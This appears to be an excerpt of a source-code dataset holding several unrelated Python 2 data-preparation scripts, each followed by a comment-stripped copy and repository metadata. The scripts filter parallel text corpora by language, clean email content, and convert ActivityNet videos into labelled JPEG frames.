deletions["source_too_long"].append("%s\t%s" % (source, target))
continue
if float((len(target) + 15)) / float(len(source) + 15) > 1.5:
deletions["source_too_short"].append("%s\t%s" % (source, target))
continue
if not lid.is_language(source, args.source_lang):
deletions["source_lang"].append(source)
continue
if not lid.is_language(target, args.target_lang):
deletions["target_lang"].append(target)
continue
args.outfile.write(line)
n_written += 1
if args.deleted:
args.deleted.write("Written: %d of %d = %f percent\n" %
(n_written, n_total,
100. * n_written / max((1, n_total))))
for reason, deleted in deletions.iteritems():
args.deleted.write("Deleted %d items due to %s\n"
% (len(deleted), reason))
for line in deleted:
if line.strip():
args.deleted.write("\t%s\n" % line.encode('utf-8'))
| 37.921875 | 78 | 0.563865 |
from collections import defaultdict
import argparse
import cld2
import langid
import sys
class LanguageIdentifier(object):
def __init__(self, use_cld2, valid_languages=None):
self.use_cld2 = use_cld2
self.valid_languages = [l.lower() for l in valid_languages]
if not use_cld2 and valid_languages:
langid.set_languages(self.valid_languages)
def is_language(self, s, expected_lang):
expected_lang = expected_lang.lower()
if self.valid_languages:
assert expected_lang in self.valid_languages
if self.use_cld2:
reliable, _text_bytes, details = cld2.detect(
s.encode("utf-8"),
isPlainText=True,
useFullLangTables=True,
bestEffort=True)
if reliable:
for _lang, langcode, confidence, score in details:
if langcode == expected_lang and confidence >= 10:
return True
return False
else:
return True
else:
lang, confidence = langid.classify(source.lower())
if lang != expected_lang and confidence > 0.9:
return False
else:
return True
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('infile', nargs='?', type=argparse.FileType('r'),
default=sys.stdin)
parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'),
default=sys.stdout)
parser.add_argument('-deleted', help='file to keep deleted lines',
type=argparse.FileType('w'))
parser.add_argument('-minscore', type=float, default=0,
help='minimum score from hunalign')
parser.add_argument('-slang', '--lang1', help='source language',
dest='source_lang', default='en')
parser.add_argument('-tlang', '--lang2', help='target language',
dest='target_lang', default='fr')
parser.add_argument('-cld2', help='use CLD2 instead of langid.py',
action='store_true')
args = parser.parse_args()
deletions = defaultdict(list)
n_written = 0
n_total = 0
lid = LanguageIdentifier(args.cld2, [args.source_lang, args.target_lang])
for line in args.infile:
n_total += 1
score = 1.0
split_line = line.rstrip('\n').split("\t")
if len(split_line) == 5:
split_line = split_line[-3:]
if len(split_line) == 3:
source, target, score = split_line
else:
assert len(split_line) == 2
source, target = split_line
source = source.decode('utf-8', 'ignore')
target = target.decode('utf-8', 'ignore')
if source == target:
deletions["identical"].append(target)
continue
if not source.strip():
deletions["source_empty"].append('')
continue
elif not target.strip():
deletions["target_empty"].append('')
continue
if float(score) < args.minscore:
deletions["low score"].append("\t".join((source, target, score)))
continue
if float((len(source) + 15)) / float(len(target) + 15) > 1.5:
deletions["source_too_long"].append("%s\t%s" % (source, target))
continue
if float((len(target) + 15)) / float(len(source) + 15) > 1.5:
deletions["source_too_short"].append("%s\t%s" % (source, target))
continue
if not lid.is_language(source, args.source_lang):
deletions["source_lang"].append(source)
continue
if not lid.is_language(target, args.target_lang):
deletions["target_lang"].append(target)
continue
args.outfile.write(line)
n_written += 1
if args.deleted:
args.deleted.write("Written: %d of %d = %f percent\n" %
(n_written, n_total,
100. * n_written / max((1, n_total))))
for reason, deleted in deletions.iteritems():
args.deleted.write("Deleted %d items due to %s\n"
% (len(deleted), reason))
for line in deleted:
if line.strip():
args.deleted.write("\t%s\n" % line.encode('utf-8'))
| true | true |
7901014cc741921cf33d5138f384c30d7875b39d | 5,686 | py | Python | stages/utils/utils.py | lif22/tmpm_pipeline | e255616e5f480f02bd0726798f2507316133ede0 | [
"Apache-2.0"
] | null | null | null | stages/utils/utils.py | lif22/tmpm_pipeline | e255616e5f480f02bd0726798f2507316133ede0 | [
"Apache-2.0"
] | null | null | null | stages/utils/utils.py | lif22/tmpm_pipeline | e255616e5f480f02bd0726798f2507316133ede0 | [
"Apache-2.0"
] | null | null | null | from argparse import ArgumentParser
import datetime
import dateutil
import sys, re
from os import path
def parseArgs():
parser = ArgumentParser(add_help=False)
parser.add_argument("-a", "--action", help="Please select an option out of <discover, manage, settings>", type=str, required=True)
parser.add_argument("-f", "--file", help="Please specify absolute path to initial dataset", type=str)
args = parser.parse_args()
# for debugging TODO: remove later
args.file = r"C:\Users\flietz\OneDrive - TU Wien\!Studium\1_MSc\!Diplomarbeit\code\pipeline\resources\dataset\Mail_ApplicationDummy.csv"
if args.action is None or args.action not in ("discover", "manage", "settings"):
sys.exit('Please specify an action out of <"discover", "manager", "settings">')
if args.action == "discover" and (args.file is None or not path.exists(args.file)):
sys.exit("The input file could not be found in the filesystem.")
arguments = {"file": args.file}
return args.action, arguments
class DataCleaner:
def __init__(self, removeURLs, removeMultWhitespace, lowercasing, dateFormat):
self.removeURLs = removeURLs
self.removeMultWhitespace = removeMultWhitespace
self.lowercasing = lowercasing
self.dateFormat = dateFormat
def apply(self, inputDf):
def removeUrl(content):
return re.sub(r'https?://\S+', '', content)
def removeMultWhitespace(content):
return re.sub(r' +', ' ', content)
# Remove URLs
if self.removeURLs:
inputDf["Content"] = inputDf.apply(lambda row: removeUrl(row["Content"]), axis=1)
# Remove Multi-Whitespaces
if self.removeMultWhitespace:
inputDf["Content"] = inputDf.apply(lambda row: removeMultWhitespace(row["Content"]), axis=1)
if self.lowercasing:
inputDf["Content"] = inputDf.apply(lambda row: row["Content"].lower(), axis=1)
# Not-Empty-Constraints
if inputDf["Content"].isnull().values.any() or \
inputDf["Datetime"].isnull().values.any() or \
inputDf["From"].isnull().values.any() or \
inputDf["To"].isnull().values.any():
raise AttributeError("Content, Datetime, From and To field cannot be empty. Please check your input dataset.")
# Unify Date format - reformat to %Y-%m-%d %H:%M:%S
def reformatDate(datestring, dateformat):
try:
newDate = dateutil.parser.parse(datestring, dayfirst=True)
return newDate.strftime(dateformat)
except ValueError as e:
raise ValueError("Make sure that all datetime columns are well-formatted "
"and that they contain dates that are within the possible bounds.") from e
inputDf["Datetime"] = inputDf.apply(lambda row: reformatDate(row["Datetime"], self.dateFormat), axis=1)
# clean signatures, clauses
def stripEndClauses(content, clauses):
clauseIndex = 0
index = 0
# Find lowest greetings or end clause index and strip off everything that comes after it
for item in clauses:
# needle and haystack both in lowercase to ignore case
index = content.lower().find(item.lower())
if index > -1 and (index < clauseIndex or clauseIndex == 0):
clauseIndex = index
if clauseIndex > 0:
return content[:clauseIndex]
else:
return content
def stripStartClauses(content, clauses):
clauseIndex = 0
index = 0
# Find lowest greetings or end clause index and strip off everything that comes after it
for item in clauses:
# needle and haystack both in lowercase to ignore case
index = content.lower().find(item.lower())
if index > -1 and (index > clauseIndex or clauseIndex == 0):
clauseIndex = index
if clauseIndex > 0:
return content[clauseIndex:]
else:
return content
startClausesList = []
endGreetingsList = ["Yours sincerely", "Sincerely", "Sincerely yours", "Take care", "Regards",
"Warm regards", "Best regards", "Kind regards", "Warmest regards", "Yours truly", "Yours,",
"Warmly,", "Warm wishes", "Best,", "Best Wishes", "Thanks in advance", "Thank you in advance",
"Thanks in advance"]
confList = ["The information contained in this communication",
"The content of this email is confidential", "The content of this e-mail", "This email and attachments (if any) is intended",
"This email is intended solely", "This e-mail is intended solely"]
endClausesList = endGreetingsList+confList
inputDf["Content"] = inputDf.apply(lambda row: stripEndClauses(row["Content"], endClausesList), axis=1)
inputDf["Content"] = inputDf.apply(lambda row: stripStartClauses(row["Content"], startClausesList), axis=1)
# Reduce multiple new-lines to one
inputDf["Content"] = inputDf.apply(lambda row: re.sub(r'\n+', '\n', row["Content"]), axis=1)
# Replace new-lines with whitespaces
inputDf["Content"] = inputDf.apply(lambda row: re.sub(r'\n', ' ', row["Content"]), axis=1)
def convertDateString(datestring):
try:
return datetime.datetime.strptime(datestring, "%Y-%m-%d %H:%M:%S")
except ValueError:
return datetime.datetime.strptime(datestring, "%Y-%m-%d %H:%M:%S") | 49.877193 | 145 | 0.616426 | from argparse import ArgumentParser
import datetime
import dateutil
import sys, re
from os import path
def parseArgs():
parser = ArgumentParser(add_help=False)
parser.add_argument("-a", "--action", help="Please select an option out of <discover, manage, settings>", type=str, required=True)
parser.add_argument("-f", "--file", help="Please specify absolute path to initial dataset", type=str)
args = parser.parse_args()
args.file = r"C:\Users\flietz\OneDrive - TU Wien\!Studium\1_MSc\!Diplomarbeit\code\pipeline\resources\dataset\Mail_ApplicationDummy.csv"
if args.action is None or args.action not in ("discover", "manage", "settings"):
sys.exit('Please specify an action out of <"discover", "manager", "settings">')
if args.action == "discover" and (args.file is None or not path.exists(args.file)):
sys.exit("The input file could not be found in the filesystem.")
arguments = {"file": args.file}
return args.action, arguments
class DataCleaner:
def __init__(self, removeURLs, removeMultWhitespace, lowercasing, dateFormat):
self.removeURLs = removeURLs
self.removeMultWhitespace = removeMultWhitespace
self.lowercasing = lowercasing
self.dateFormat = dateFormat
def apply(self, inputDf):
def removeUrl(content):
return re.sub(r'https?://\S+', '', content)
def removeMultWhitespace(content):
return re.sub(r' +', ' ', content)
if self.removeURLs:
inputDf["Content"] = inputDf.apply(lambda row: removeUrl(row["Content"]), axis=1)
if self.removeMultWhitespace:
inputDf["Content"] = inputDf.apply(lambda row: removeMultWhitespace(row["Content"]), axis=1)
if self.lowercasing:
inputDf["Content"] = inputDf.apply(lambda row: row["Content"].lower(), axis=1)
if inputDf["Content"].isnull().values.any() or \
inputDf["Datetime"].isnull().values.any() or \
inputDf["From"].isnull().values.any() or \
inputDf["To"].isnull().values.any():
raise AttributeError("Content, Datetime, From and To field cannot be empty. Please check your input dataset.")
def reformatDate(datestring, dateformat):
try:
newDate = dateutil.parser.parse(datestring, dayfirst=True)
return newDate.strftime(dateformat)
except ValueError as e:
raise ValueError("Make sure that all datetime columns are well-formatted "
"and that they contain dates that are within the possible bounds.") from e
inputDf["Datetime"] = inputDf.apply(lambda row: reformatDate(row["Datetime"], self.dateFormat), axis=1)
def stripEndClauses(content, clauses):
clauseIndex = 0
index = 0
for item in clauses:
index = content.lower().find(item.lower())
if index > -1 and (index < clauseIndex or clauseIndex == 0):
clauseIndex = index
if clauseIndex > 0:
return content[:clauseIndex]
else:
return content
def stripStartClauses(content, clauses):
clauseIndex = 0
index = 0
for item in clauses:
index = content.lower().find(item.lower())
if index > -1 and (index > clauseIndex or clauseIndex == 0):
clauseIndex = index
if clauseIndex > 0:
return content[clauseIndex:]
else:
return content
startClausesList = []
endGreetingsList = ["Yours sincerely", "Sincerely", "Sincerely yours", "Take care", "Regards",
"Warm regards", "Best regards", "Kind regards", "Warmest regards", "Yours truly", "Yours,",
"Warmly,", "Warm wishes", "Best,", "Best Wishes", "Thanks in advance", "Thank you in advance",
"Thanks in advance"]
confList = ["The information contained in this communication",
"The content of this email is confidential", "The content of this e-mail", "This email and attachments (if any) is intended",
"This email is intended solely", "This e-mail is intended solely"]
endClausesList = endGreetingsList+confList
inputDf["Content"] = inputDf.apply(lambda row: stripEndClauses(row["Content"], endClausesList), axis=1)
inputDf["Content"] = inputDf.apply(lambda row: stripStartClauses(row["Content"], startClausesList), axis=1)
inputDf["Content"] = inputDf.apply(lambda row: re.sub(r'\n+', '\n', row["Content"]), axis=1)
inputDf["Content"] = inputDf.apply(lambda row: re.sub(r'\n', ' ', row["Content"]), axis=1)
def convertDateString(datestring):
try:
return datetime.datetime.strptime(datestring, "%Y-%m-%d %H:%M:%S")
except ValueError:
return datetime.datetime.strptime(datestring, "%Y-%m-%d %H:%M:%S") | true | true |
7901016f4be671cdbe0ec7f89bdd3cd39d3243af | 12,384 | py | Python | python-scripts/convertMP4toJPG.py | gurkirt/actNet-inAct | 1930bcb41553e50ddd83985a497a9d5ce4f1fcf2 | [
"MIT"
] | 27 | 2016-05-04T07:13:05.000Z | 2021-12-05T04:45:45.000Z | python-scripts/convertMP4toJPG.py | gurkirt/actNet-inAct | 1930bcb41553e50ddd83985a497a9d5ce4f1fcf2 | [
"MIT"
] | 1 | 2017-12-28T08:29:00.000Z | 2017-12-28T08:29:00.000Z | python-scripts/convertMP4toJPG.py | gurkirt/actNet-inAct | 1930bcb41553e50ddd83985a497a9d5ce4f1fcf2 | [
"MIT"
] | 12 | 2016-05-15T21:40:06.000Z | 2019-11-27T09:43:55.000Z | '''
Autor: Gurkirt Singh
Start data: 2nd May 2016
purpose: of this file is to take all .mp4 videos and convert them to jpg images
'''
import numpy as np
import cv2 as cv2
import math,pickle,shutil,os
baseDir = "/mnt/sun-alpha/actnet/";
vidDir = "/mnt/earth-beta/actnet/videos/";
imgDir = "/mnt/sun-alpha/actnet/rgb-images/";
annotPklFile = "../Evaluation/data/actNet200-V1-3.pkl"
#os.mkdir(imgDir)
annotFile = "../anetv13.json"
def getAnnotations():
with open(annotFile) as f:
annoData = json.load(f)
taxonomy = annoData["taxonomy"]
version = annoData["version"]
database = annoData["database"]
print len(database),version,len(taxonomy)
def getNumFrames(filename):
cap = cv2.VideoCapture(filename)
if not cap.isOpened():
print "could not open :",filename
return -1
numf = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
return numf
def getVidedInfo(filename):
try:
cap = cv2.VideoCapture(filename)
except cv2.error as e:
print e
return 0,0,0,0,-1
if not cap.isOpened():
print "could not open :",filename
return 0,0,0,0,-1
numf = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
width = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_WIDTH))
height = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.cv.CV_CAP_PROP_FPS)
return numf,width,height,fps,cap
def getsmallestDimto256(width,height):
if width>=height:
newH = 256
newW = int(math.ceil((float(newH)/height)*width))
else:
newW = 256
newH = int(math.ceil((float(newW)/width)*height))
return newW,newH
def getframelabels(annotations,numf):
framelabels = np.ones(numf,dtype='uint16')*200;
for annot in annotations:
actionId = annot['class']
startframe = annot['sf']
endframe = annot['ef']
framelabels[startframe:endframe] = int(actionId)-1
return framelabels
def movefiles(storageDir,framelabels,numfs):
dst = ''
for ind in range(numfs):
label = framelabels[ind]
src = storageDir+str(ind).zfill(5)+".jpg"
dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
shutil.move(src,dst)
print dst ,' MOVED '
def convertVideosL():
print "this is convertVideos function with labels"
ecount = 0
with open(annotPklFile,'rb') as f:
actNetDB = pickle.load(f)
actionIDs = actNetDB['actionIDs']; taxonomy=actNetDB['taxonomy']; database = actNetDB['database'];
for videoId in reversed(database.keys()):
ecount+=1
if ecount>0:
videoInfo = database[videoId]
storageDir = imgDir+'v_'+videoId+"/"
print videoInfo['subset']
if not videoInfo['isnull'] and not videoInfo['subset'] == 'testing':
videoname = vidDir+'v_'+videoId+'.mp4'
if not os.path.isfile(videoname):
videoname = vidDir+'v_'+videoId+'.mkv'
print storageDir,' ecount ',ecount,videoInfo['subset']
numfs = videoInfo['numf']
annotations = videoInfo['annotations']
framelabels = getframelabels(annotations,numfs)
imgname = storageDir+str(numfs-1).zfill(5)+".jpg"
if os.path.isfile(imgname):
movefiles(storageDir,framelabels,numfs)
else:
dst = storageDir+str(numfs-1).zfill(5)+'-ActId'+str(framelabels[-1]).zfill(3)+'.jpg'
if not os.path.isfile(dst):
numf,width,height,fps,cap = getVidedInfo(videoname)
if not cap == -1 and numf == numfs:
newW=256;newH=256;
framecount = 0;
if cap.isOpened():
if not os.path.isdir(storageDir):
os.mkdir(storageDir)
for ind in xrange(numf):
label = framelabels[ind]
dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
retval,image = cap.read()
if not image is None:
resizedImage = cv2.resize(image,(newW,newH))
cv2.imwrite(dst,resizedImage)
else:
cv2.imwrite(dst,resizedImage)
print ' . ',
print dst , 'is created'
else:
with open('vids/'+videoId+'.txt','wb') as f:
f.write('error')
else:
print dst , 'is already there'
def convertTestVideos():
print "this is convertVideos function with labels"
ecount = 0
with open(annotPklFile,'rb') as f:
actNetDB = pickle.load(f)
actionIDs = actNetDB['actionIDs']; taxonomy=actNetDB['taxonomy']; database = actNetDB['database'];
for videoId in database.keys():
ecount+=1
if ecount>0:
videoInfo = database[videoId]
storageDir = imgDir+'v_'+videoId+"/"
print videoInfo['subset']
if not videoInfo['isnull'] and videoInfo['subset'] == 'testing':
videoname = vidDir+'v_'+videoId+'.mp4'
if not os.path.isfile(videoname):
videoname = vidDir+'v_'+videoId+'.mkv'
print storageDir,' ecount ',ecount,videoInfo['subset']
numfs = videoInfo['numf']
# annotations = videoInfo['annotations']
framelabels = np.ones(numfs,dtype='uint16')*200;
imgname = storageDir+str(numfs-1).zfill(5)+".jpg"
if os.path.isfile(imgname):
movefiles(storageDir,framelabels,numfs)
else:
dst = storageDir+str(numfs-1).zfill(5)+'-ActId'+str(framelabels[-1]).zfill(3)+'.jpg'
if not os.path.isfile(dst):
numf,width,height,fps,cap = getVidedInfo(videoname)
if not cap == -1 and numf == numfs:
newW=256;newH=256;
framecount = 0;
if cap.isOpened():
if not os.path.isdir(storageDir):
os.mkdir(storageDir)
for ind in xrange(numf):
label = framelabels[ind]
dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
retval,image = cap.read()
if not image is None:
resizedImage = cv2.resize(image,(newW,newH))
cv2.imwrite(dst,resizedImage)
else:
cv2.imwrite(dst,resizedImage)
print ' . ',
print dst , 'is created'
else:
with open('vids/'+videoId+'.txt','wb') as f:
f.write('error')
else:
print dst , 'is already there'
def convertVideos():
print "this is convertVideos function"
## vidDir = vidDirtemp
vidlist = os.listdir(vidDir)
vidlist = [vid for vid in vidlist if vid.startswith("v_")]
print "Number of sucessfully donwloaded ",len(vidlist)
vcount =0
for videname in reversed(vidlist):
vcount+=1
if vcount>0:
src = vidDir+videname
numf,width,height,fps,cap = getVidedInfo(src)
if not cap == -1:
newW=256;newH=256;
print videname, width,height,' and newer are ',newW,newH, ' fps ',fps,' numf ', numf, ' vcount ',vcount
framecount = 0;
storageDir = imgDir+videname.split('.')[0]+"/"
imgname = storageDir+str(numf-1).zfill(5)+".jpg"
if not os.path.isfile(imgname):
if cap.isOpened():
if not os.path.isdir(storageDir):
os.mkdir(storageDir)
for f in xrange(numf):
retval,image = cap.read()
if not image is None:
# print np.shape(retval),np.shape(image), type(image),f
resizedImage = cv2.resize(image,(newW,newH))
imgname = storageDir+str(framecount).zfill(5)+".jpg"
cv2.imwrite(imgname,resizedImage)
else:
imgname = storageDir+str(framecount).zfill(5)+".jpg"
cv2.imwrite(imgname,resizedImage)
print 'we have missing frame ',framecount
framecount+=1
print imgname
else:
with open('vids/'+videname.split('.')[0]+'.txt','wb') as f:
f.write('error')
def getframelabels4both(annotations,numf,subset):
framelabels = np.ones(numf,dtype='uint16')*200;
if subset == 'testing':
return framelabels
for annot in annotations:
actionId = annot['class']
startframe = annot['sf']
endframe = annot['ef']
framelabels[startframe:endframe] = int(actionId)-1
return framelabels
def genVideoImageLists():
subset = 'testing'
print "this is genVideoImageLists function"
ecount = 0; vcount = 0;
listname = '{}lists/{}.list'.format(baseDir,subset)
fid = open(listname,'wb')
with open(annotPklFile,'rb') as f:
actNetDB = pickle.load(f)
actionIDs = actNetDB['actionIDs']; taxonomy=actNetDB['taxonomy']; database = actNetDB['database'];
for videoId in database.keys():
ecount+=1
if ecount>0:
videoInfo = database[videoId]
if not videoInfo['isnull'] and videoInfo['subset'] == subset:
vcount+=1
storageDir = imgDir+'v_'+videoId+"/"
videlistName = '{}lists/{}/v_{}.list'.format(baseDir,subset,videoId)
fid.write(videlistName+'\n');
vfid = open(videlistName,'wb');
print storageDir,' ecount ',ecount,videoInfo['subset']
numfs = videoInfo['numf']
annotations = videoInfo['annotations']
framelabels = getframelabels4both(annotations,numfs,subset)
dst = storageDir+str(numfs-1).zfill(5)+'-ActId'+str(framelabels[-1]).zfill(3)+'.jpg'
if os.path.isfile(dst):
for ind in xrange(numfs):
label = framelabels[ind]
dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
vfid.write(dst+'\n')
else:
RuntimeError('check if file exists '+dst)
def checkConverted():
print "this is checkConverted videos function"
vidlist = os.listdir(vidDir)
vidlist = [vid for vid in vidlist if vid.endswith(".mp4")]
print "Number of sucessfully donwloaded ",len(vidlist)
vcount =0
for videname in vidlist[15000:]:
src = vidDir+videname
numF = getNumFrames(src)
if numF>0:
imgname = imgDir+videname.split('.')[0]+"/"+str(numF-1).zfill(5)+".jpg"
print 'last frame is ',imgname,' vocunt ',vcount
vcount+=1
dst = vidDirtemp+videname
if not os.path.isfile(imgname):
shutil.move(src,dst)
print " moved this one to ", dst
if __name__=="__main__":
# checkConverted()
# convertVideosL()
# convertTestVideos()
genVideoImageLists()
| 42.851211 | 120 | 0.505087 | '''
Autor: Gurkirt Singh
Start data: 2nd May 2016
purpose: of this file is to take all .mp4 videos and convert them to jpg images
'''
import numpy as np
import cv2 as cv2
import math,pickle,shutil,os
baseDir = "/mnt/sun-alpha/actnet/";
vidDir = "/mnt/earth-beta/actnet/videos/";
imgDir = "/mnt/sun-alpha/actnet/rgb-images/";
annotPklFile = "../Evaluation/data/actNet200-V1-3.pkl"
annotFile = "../anetv13.json"
def getAnnotations():
with open(annotFile) as f:
annoData = json.load(f)
taxonomy = annoData["taxonomy"]
version = annoData["version"]
database = annoData["database"]
print len(database),version,len(taxonomy)
def getNumFrames(filename):
cap = cv2.VideoCapture(filename)
if not cap.isOpened():
print "could not open :",filename
return -1
numf = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
return numf
def getVidedInfo(filename):
try:
cap = cv2.VideoCapture(filename)
except cv2.error as e:
print e
return 0,0,0,0,-1
if not cap.isOpened():
print "could not open :",filename
return 0,0,0,0,-1
numf = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
width = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_WIDTH))
height = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.cv.CV_CAP_PROP_FPS)
return numf,width,height,fps,cap
def getsmallestDimto256(width,height):
if width>=height:
newH = 256
newW = int(math.ceil((float(newH)/height)*width))
else:
newW = 256
newH = int(math.ceil((float(newW)/width)*height))
return newW,newH
def getframelabels(annotations,numf):
framelabels = np.ones(numf,dtype='uint16')*200;
for annot in annotations:
actionId = annot['class']
startframe = annot['sf']
endframe = annot['ef']
framelabels[startframe:endframe] = int(actionId)-1
return framelabels
def movefiles(storageDir,framelabels,numfs):
dst = ''
for ind in range(numfs):
label = framelabels[ind]
src = storageDir+str(ind).zfill(5)+".jpg"
dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
shutil.move(src,dst)
print dst ,' MOVED '
def convertVideosL():
print "this is convertVideos function with labels"
ecount = 0
with open(annotPklFile,'rb') as f:
actNetDB = pickle.load(f)
actionIDs = actNetDB['actionIDs']; taxonomy=actNetDB['taxonomy']; database = actNetDB['database'];
for videoId in reversed(database.keys()):
ecount+=1
if ecount>0:
videoInfo = database[videoId]
storageDir = imgDir+'v_'+videoId+"/"
print videoInfo['subset']
if not videoInfo['isnull'] and not videoInfo['subset'] == 'testing':
videoname = vidDir+'v_'+videoId+'.mp4'
if not os.path.isfile(videoname):
videoname = vidDir+'v_'+videoId+'.mkv'
print storageDir,' ecount ',ecount,videoInfo['subset']
numfs = videoInfo['numf']
annotations = videoInfo['annotations']
framelabels = getframelabels(annotations,numfs)
imgname = storageDir+str(numfs-1).zfill(5)+".jpg"
if os.path.isfile(imgname):
movefiles(storageDir,framelabels,numfs)
else:
dst = storageDir+str(numfs-1).zfill(5)+'-ActId'+str(framelabels[-1]).zfill(3)+'.jpg'
if not os.path.isfile(dst):
numf,width,height,fps,cap = getVidedInfo(videoname)
if not cap == -1 and numf == numfs:
newW=256;newH=256;
framecount = 0;
if cap.isOpened():
if not os.path.isdir(storageDir):
os.mkdir(storageDir)
for ind in xrange(numf):
label = framelabels[ind]
dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
retval,image = cap.read()
if not image is None:
resizedImage = cv2.resize(image,(newW,newH))
cv2.imwrite(dst,resizedImage)
else:
cv2.imwrite(dst,resizedImage)
print ' . ',
print dst , 'is created'
else:
with open('vids/'+videoId+'.txt','wb') as f:
f.write('error')
else:
print dst , 'is already there'
def convertTestVideos():
print "this is convertVideos function with labels"
ecount = 0
with open(annotPklFile,'rb') as f:
actNetDB = pickle.load(f)
actionIDs = actNetDB['actionIDs']; taxonomy=actNetDB['taxonomy']; database = actNetDB['database'];
for videoId in database.keys():
ecount+=1
if ecount>0:
videoInfo = database[videoId]
storageDir = imgDir+'v_'+videoId+"/"
print videoInfo['subset']
if not videoInfo['isnull'] and videoInfo['subset'] == 'testing':
videoname = vidDir+'v_'+videoId+'.mp4'
if not os.path.isfile(videoname):
videoname = vidDir+'v_'+videoId+'.mkv'
print storageDir,' ecount ',ecount,videoInfo['subset']
numfs = videoInfo['numf']
framelabels = np.ones(numfs,dtype='uint16')*200;
imgname = storageDir+str(numfs-1).zfill(5)+".jpg"
if os.path.isfile(imgname):
movefiles(storageDir,framelabels,numfs)
else:
dst = storageDir+str(numfs-1).zfill(5)+'-ActId'+str(framelabels[-1]).zfill(3)+'.jpg'
if not os.path.isfile(dst):
numf,width,height,fps,cap = getVidedInfo(videoname)
if not cap == -1 and numf == numfs:
newW=256;newH=256;
framecount = 0;
if cap.isOpened():
if not os.path.isdir(storageDir):
os.mkdir(storageDir)
for ind in xrange(numf):
label = framelabels[ind]
dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
retval,image = cap.read()
if not image is None:
resizedImage = cv2.resize(image,(newW,newH))
cv2.imwrite(dst,resizedImage)
else:
cv2.imwrite(dst,resizedImage)
print ' . ',
print dst , 'is created'
else:
with open('vids/'+videoId+'.txt','wb') as f:
f.write('error')
else:
print dst , 'is already there'
def convertVideos():
print "this is convertVideos function"
r(vidDir)
vidlist = [vid for vid in vidlist if vid.startswith("v_")]
print "Number of sucessfully donwloaded ",len(vidlist)
vcount =0
for videname in reversed(vidlist):
vcount+=1
if vcount>0:
src = vidDir+videname
numf,width,height,fps,cap = getVidedInfo(src)
if not cap == -1:
newW=256;newH=256;
print videname, width,height,' and newer are ',newW,newH, ' fps ',fps,' numf ', numf, ' vcount ',vcount
framecount = 0;
storageDir = imgDir+videname.split('.')[0]+"/"
imgname = storageDir+str(numf-1).zfill(5)+".jpg"
if not os.path.isfile(imgname):
if cap.isOpened():
if not os.path.isdir(storageDir):
os.mkdir(storageDir)
for f in xrange(numf):
retval,image = cap.read()
if not image is None:
resizedImage = cv2.resize(image,(newW,newH))
imgname = storageDir+str(framecount).zfill(5)+".jpg"
cv2.imwrite(imgname,resizedImage)
else:
imgname = storageDir+str(framecount).zfill(5)+".jpg"
cv2.imwrite(imgname,resizedImage)
print 'we have missing frame ',framecount
framecount+=1
print imgname
else:
with open('vids/'+videname.split('.')[0]+'.txt','wb') as f:
f.write('error')
def getframelabels4both(annotations,numf,subset):
framelabels = np.ones(numf,dtype='uint16')*200;
if subset == 'testing':
return framelabels
for annot in annotations:
actionId = annot['class']
startframe = annot['sf']
endframe = annot['ef']
framelabels[startframe:endframe] = int(actionId)-1
return framelabels
def genVideoImageLists():
subset = 'testing'
print "this is genVideoImageLists function"
ecount = 0; vcount = 0;
listname = '{}lists/{}.list'.format(baseDir,subset)
fid = open(listname,'wb')
with open(annotPklFile,'rb') as f:
actNetDB = pickle.load(f)
actionIDs = actNetDB['actionIDs']; taxonomy=actNetDB['taxonomy']; database = actNetDB['database'];
for videoId in database.keys():
ecount+=1
if ecount>0:
videoInfo = database[videoId]
if not videoInfo['isnull'] and videoInfo['subset'] == subset:
vcount+=1
storageDir = imgDir+'v_'+videoId+"/"
videlistName = '{}lists/{}/v_{}.list'.format(baseDir,subset,videoId)
fid.write(videlistName+'\n');
vfid = open(videlistName,'wb');
print storageDir,' ecount ',ecount,videoInfo['subset']
numfs = videoInfo['numf']
annotations = videoInfo['annotations']
framelabels = getframelabels4both(annotations,numfs,subset)
dst = storageDir+str(numfs-1).zfill(5)+'-ActId'+str(framelabels[-1]).zfill(3)+'.jpg'
if os.path.isfile(dst):
for ind in xrange(numfs):
label = framelabels[ind]
dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
vfid.write(dst+'\n')
else:
RuntimeError('check if file exists '+dst)
def checkConverted():
print "this is checkConverted videos function"
vidlist = os.listdir(vidDir)
vidlist = [vid for vid in vidlist if vid.endswith(".mp4")]
print "Number of sucessfully donwloaded ",len(vidlist)
vcount =0
for videname in vidlist[15000:]:
src = vidDir+videname
numF = getNumFrames(src)
if numF>0:
imgname = imgDir+videname.split('.')[0]+"/"+str(numF-1).zfill(5)+".jpg"
print 'last frame is ',imgname,' vocunt ',vcount
vcount+=1
dst = vidDirtemp+videname
if not os.path.isfile(imgname):
shutil.move(src,dst)
print " moved this one to ", dst
if __name__=="__main__":
genVideoImageLists()
| false | true |
790102022efed7168bc92fc88fb475e451756dca | 896 | py | Python | packages/@aws-cdk-containers/ecs-service-extensions/lib/extensions/assign-public-ip/lambda/index.py | RichiCoder1/aws-cdk | 626e6aa1a27feffe7ce60a46a6fdcf26f317eaef | [
"Apache-2.0"
] | 6,159 | 2019-07-11T16:53:02.000Z | 2022-03-31T20:52:53.000Z | packages/@aws-cdk-containers/ecs-service-extensions/lib/extensions/assign-public-ip/lambda/index.py | RichiCoder1/aws-cdk | 626e6aa1a27feffe7ce60a46a6fdcf26f317eaef | [
"Apache-2.0"
